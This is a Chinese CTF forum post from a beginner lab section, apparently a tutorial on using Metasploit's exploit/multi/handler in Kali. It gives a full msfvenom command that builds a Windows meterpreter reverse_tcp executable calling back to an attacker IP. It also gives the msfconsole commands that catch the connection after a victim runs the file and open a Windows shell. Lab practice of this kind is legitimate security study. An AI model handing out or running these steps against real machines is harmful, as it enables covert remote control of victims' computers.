设为首页
收藏本站
开启辅助访问
切换到窄版
登录
立即注册
只需一步,快速开始
论坛
BBS
Tools
CTF在线工具箱,CTF工具下载
CTF平台1
BugkuCTF - CTF爱好者的练习平台
CTF平台2
搜索
搜索
每日签到
本版
帖子
战队
用户
CTF论坛
»
论坛
›
技术交流
›
新手入门/靶场实验
›
Kali-利用metasploit中的exploit/multi/handler进行攻击 ...
返回列表
发新帖
[新手入门]
Kali-利用metasploit中的exploit/multi/handler进行攻击
[复制链接]
14898
|
0
|
2018-8-2 14:11:58
|
显示全部楼层
|
阅读模式
在攻击服务器上生成连接软件,LHOST为攻击机IP地址
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe
打开msfconsole控制台
将软件发给客户机上运行,此时kali上会有连接提示
[mw_shl_code=applescript,true]root@qzwhost:~# msfconsole
msfconsole > use exploit/multi/handler
msfconsole (exploit/multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msfconsole (exploit/multi/handler) > set LHOST <IP>
msfconsole (exploit/multi/handler) > set LPORT 443
msfconsole (exploit/multi/handler) > exploit[/mw_shl_code]
此时连接建立成功,输入shell测试
出现Windows命令行则说明攻击成功
如果提醒如下,输入shell显示meterpreter > shell [-] Unknown command: shell.,说明链接未建立成功
meterpreter > shell
[-] Unknown command: shell.
回复
使用道具
举报
变色卡
照妖镜
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
1368902371
4
主题
6
帖子
60
积分
小有名气
小有名气, 积分 60, 距离下一级还需 140 积分
小有名气, 积分 60, 距离下一级还需 140 积分
积分
60
发消息
回复楼主
返回列表
新手入门/靶场实验
CTF/安全技术交流
CTF题库/赛事预告